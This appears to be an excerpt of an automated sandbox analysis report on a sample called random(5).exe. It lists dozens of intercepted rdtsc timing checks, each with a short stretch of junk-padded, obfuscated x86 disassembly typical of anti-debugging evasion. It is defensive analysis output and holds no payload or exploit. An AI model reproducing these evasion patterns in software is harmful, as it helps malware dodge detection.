    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E903C1 second address: 6E9044F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a jmp 00007F519CD4C382h 0x0000000f pushfd 0x00000010 jmp 00007F519CD4C382h 0x00000015 or esi, 3F233888h 0x0000001b jmp 00007F519CD4C37Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [esp], edi 0x00000025 pushad 0x00000026 mov di, ax 0x00000029 pushfd 0x0000002a jmp 00007F519CD4C380h 0x0000002f sub al, FFFFFFE8h 0x00000032 jmp 00007F519CD4C37Bh 0x00000037 popfd 0x00000038 popad 0x00000039 push dword ptr [eax] 0x0000003b jmp 00007F519CD4C386h 0x00000040 mov eax, dword ptr fs:[00000030h] 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9044F second address: 6E90455 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E904B6 second address: 6E904C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C37Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E904C8 second address: 6E90559 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a jmp 00007F519CFC89C7h 0x0000000f test esi, esi 0x00000011 jmp 00007F519CFC89C6h 0x00000016 je 00007F520C377B5Dh 0x0000001c jmp 00007F519CFC89C0h 0x00000021 sub eax, eax 0x00000023 pushad 0x00000024 call 00007F519CFC89C7h 0x00000029 pushad 0x0000002a popad 0x0000002b pop ecx 0x0000002c mov bx, 432Ah 0x00000030 popad 0x00000031 mov dword ptr [esi], edi 0x00000033 jmp 00007F519CFC89C1h 0x00000038 mov dword ptr [esi+04h], eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov ebx, 7729787Eh 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90559 second address: 6E9055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9055E second address: 6E90581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 mov cx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+08h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F519CFC89C2h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90581 second address: 6E90628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CD4C381h 0x00000009 xor ch, 00000066h 0x0000000c jmp 00007F519CD4C381h 0x00000011 popfd 0x00000012 call 00007F519CD4C380h 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esi+0Ch], eax 0x0000001e jmp 00007F519CD4C381h 0x00000023 mov eax, dword ptr [ebx+4Ch] 0x00000026 jmp 00007F519CD4C37Eh 0x0000002b mov dword ptr [esi+10h], eax 0x0000002e pushad 0x0000002f call 00007F519CD4C37Eh 0x00000034 mov esi, 5EA562F1h 0x00000039 pop eax 0x0000003a movsx edx, si 0x0000003d popad 0x0000003e mov eax, dword ptr [ebx+50h] 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 pushfd 0x00000045 jmp 00007F519CD4C382h 0x0000004a or ch, FFFFFFF8h 0x0000004d jmp 00007F519CD4C37Bh 0x00000052 popfd 0x00000053 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90628 second address: 6E9069A instructions: 0x00000000 rdtsc 0x00000002 mov ah, BAh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dl, 2Ch 0x00000008 popad 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c jmp 00007F519CFC89BCh 0x00000011 mov eax, dword ptr [ebx+54h] 0x00000014 pushad 0x00000015 call 00007F519CFC89BEh 0x0000001a mov edi, ecx 0x0000001c pop eax 0x0000001d call 00007F519CFC89C7h 0x00000022 pushad 0x00000023 popad 0x00000024 pop eax 0x00000025 popad 0x00000026 mov dword ptr [esi+18h], eax 0x00000029 jmp 00007F519CFC89C5h 0x0000002e mov eax, dword ptr [ebx+58h] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F519CFC89BDh 0x00000038 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9069A second address: 6E906AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C37Ch 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E906AA second address: 6E906AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E906AE second address: 6E906C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+1Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F519CD4C37Ah 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E906C5 second address: 6E906CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E906CB second address: 6E906CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E906CF second address: 6E906E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+5Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F519CFC89BBh 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E906E9 second address: 6E90706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90706 second address: 6E90775 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CFC89C7h 0x00000009 sub esi, 1144D8FEh 0x0000000f jmp 00007F519CFC89C9h 0x00000014 popfd 0x00000015 call 00007F519CFC89C0h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [esi+20h], eax 0x00000021 jmp 00007F519CFC89C1h 0x00000026 mov eax, dword ptr [ebx+60h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov ebx, 7B7AB3BEh 0x00000031 popad 0x00000032 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90775 second address: 6E9077B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9077B second address: 6E9077F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9077F second address: 6E90783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90783 second address: 6E90794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+24h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90794 second address: 6E90798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90798 second address: 6E9079E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9079E second address: 6E907B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c pushad 0x0000000d mov si, 5ECDh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E907B7 second address: 6E907FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, 9A85h 0x00000008 popad 0x00000009 popad 0x0000000a mov dword ptr [esi+28h], eax 0x0000000d jmp 00007F519CFC89C0h 0x00000012 mov eax, dword ptr [ebx+68h] 0x00000015 pushad 0x00000016 popad 0x00000017 mov dword ptr [esi+2Ch], eax 0x0000001a pushad 0x0000001b mov ebx, ecx 0x0000001d popad 0x0000001e mov ax, word ptr [ebx+6Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F519CFC89C9h 0x00000029 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E907FF second address: 6E90834 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 7FF2h 0x00000007 mov ebx, 5AD0A93Eh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov word ptr [esi+30h], ax 0x00000013 jmp 00007F519CD4C385h 0x00000018 mov ax, word ptr [ebx+00000088h] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90834 second address: 6E90838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90838 second address: 6E9083E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9083E second address: 6E90873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CFC89C0h 0x00000009 add ch, 00000068h 0x0000000c jmp 00007F519CFC89BBh 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov word ptr [esi+32h], ax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov dx, E862h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90873 second address: 6E90878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90878 second address: 6E908AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F519CFC89C4h 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+0000008Ch] 0x00000013 jmp 00007F519CFC89BCh 0x00000018 mov dword ptr [esi+34h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ah, bh 0x00000020 popad 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E908AF second address: 6E908C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C37Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E908C1 second address: 6E9091B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+18h] 0x0000000b jmp 00007F519CFC89C7h 0x00000010 mov dword ptr [esi+38h], eax 0x00000013 pushad 0x00000014 jmp 00007F519CFC89C4h 0x00000019 jmp 00007F519CFC89C2h 0x0000001e popad 0x0000001f mov eax, dword ptr [ebx+1Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov di, A960h 0x00000029 mov eax, edx 0x0000002b popad 0x0000002c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9091B second address: 6E90930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C381h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90930 second address: 6E90974 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+3Ch], eax 0x0000000e jmp 00007F519CFC89BEh 0x00000013 mov eax, dword ptr [ebx+20h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F519CFC89C7h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90974 second address: 6E90A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov dh, A1h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+40h], eax 0x0000000e pushad 0x0000000f movzx ecx, di 0x00000012 jmp 00007F519CD4C385h 0x00000017 popad 0x00000018 lea eax, dword ptr [ebx+00000080h] 0x0000001e pushad 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F519CD4C389h 0x00000026 add ecx, 7E16E3E6h 0x0000002c jmp 00007F519CD4C381h 0x00000031 popfd 0x00000032 popad 0x00000033 mov ah, CEh 0x00000035 popad 0x00000036 push 00000001h 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F519CD4C389h 0x0000003f sub eax, 787293F6h 0x00000045 jmp 00007F519CD4C381h 0x0000004a popfd 0x0000004b push ecx 0x0000004c mov esi, ebx 0x0000004e pop edx 0x0000004f popad 0x00000050 nop 0x00000051 pushad 0x00000052 movzx eax, dx 0x00000055 jmp 00007F519CD4C381h 0x0000005a popad 0x0000005b push eax 0x0000005c jmp 00007F519CD4C381h 0x00000061 nop 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90A43 second address: 6E90A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90A47 second address: 6E90A5F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, 26CBh 0x0000000a popad 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bx, 7F3Eh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90A5F second address: 6E90A99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F519CFC89C0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F519CFC89BCh 0x00000018 mov ah, F3h 0x0000001a popad 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90B07 second address: 6E90B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b pushad 0x0000000c pushad 0x0000000d mov dx, cx 0x00000010 mov ebx, esi 0x00000012 popad 0x00000013 mov di, ax 0x00000016 popad 0x00000017 js 00007F520C0FAF15h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90B30 second address: 6E90B36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90B36 second address: 6E90B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90B3C second address: 6E90B5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90B5D second address: 6E90B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90B61 second address: 6E90B67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E50361 second address: 6E50367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E50367 second address: 6E503CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CD4C37Ah 0x00000009 adc cx, 0318h 0x0000000e jmp 00007F519CD4C37Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F519CD4C388h 0x0000001a xor ch, 00000078h 0x0000001d jmp 00007F519CD4C37Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 pop esi 0x00000027 jmp 00007F519CD4C386h 0x0000002c pop ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E503CF second address: 6E503D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E503D3 second address: 6E503D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E503D7 second address: 6E503DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E8013D second address: 6E80143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E80143 second address: 6E80147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E70844 second address: 6E70853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E70853 second address: 6E70859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E70859 second address: 6E7085D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E7085D second address: 6E708AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F519CFC89BEh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dx, C6A0h 0x00000016 pushfd 0x00000017 jmp 00007F519CFC89C9h 0x0000001c and ah, FFFFFFA6h 0x0000001f jmp 00007F519CFC89C1h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E803BD second address: 6E803C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E803C3 second address: 6E803C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E803C7 second address: 6E803CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E803CB second address: 6E803F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, 1F9Ch 0x00000010 jmp 00007F519CFC89C5h 0x00000015 popad 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E803F1 second address: 6E803F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E803F7 second address: 6E803FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E803FB second address: 6E80417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov bl, 7Bh 0x0000000e mov ecx, 3B2F5D3Dh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E80417 second address: 6E8041D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0A57 second address: 6EF0AB3 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 366Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F519CD4C382h 0x0000000f or cl, FFFFFF98h 0x00000012 jmp 00007F519CD4C37Bh 0x00000017 popfd 0x00000018 pushfd 0x00000019 jmp 00007F519CD4C388h 0x0000001e add ch, FFFFFFF8h 0x00000021 jmp 00007F519CD4C37Bh 0x00000026 popfd 0x00000027 popad 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0AB3 second address: 6EF0AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0AB9 second address: 6EF0B0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, dx 0x0000000e call 00007F519CD4C37Dh 0x00000013 push ecx 0x00000014 pop ebx 0x00000015 pop esi 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F519CD4C383h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushad 0x00000021 mov dx, cx 0x00000024 mov edi, esi 0x00000026 popad 0x00000027 jmp 00007F519CD4C37Ah 0x0000002c popad 0x0000002d mov dl, byte ptr [ebp+14h] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0B0F second address: 6EF0B2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0B2C second address: 6EF0B6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F519CD4C387h 0x00000008 pop ecx 0x00000009 mov dx, 59ECh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [ebp+10h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 call 00007F519CD4C387h 0x0000001b pop esi 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0B6C second address: 6EF0B92 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 471C3E4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d popad 0x0000000e and dl, 00000007h 0x00000011 pushad 0x00000012 movsx ebx, si 0x00000015 mov ebx, esi 0x00000017 popad 0x00000018 test eax, eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov ax, bx 0x00000020 mov edx, 4DAA6D98h 0x00000025 popad 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6EF0B92 second address: 6EF0BB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F520D1D19C4h 0x0000000f pushad 0x00000010 movzx ecx, dx 0x00000013 push eax 0x00000014 push edx 0x00000015 mov ch, dl 0x00000017 rdtsc
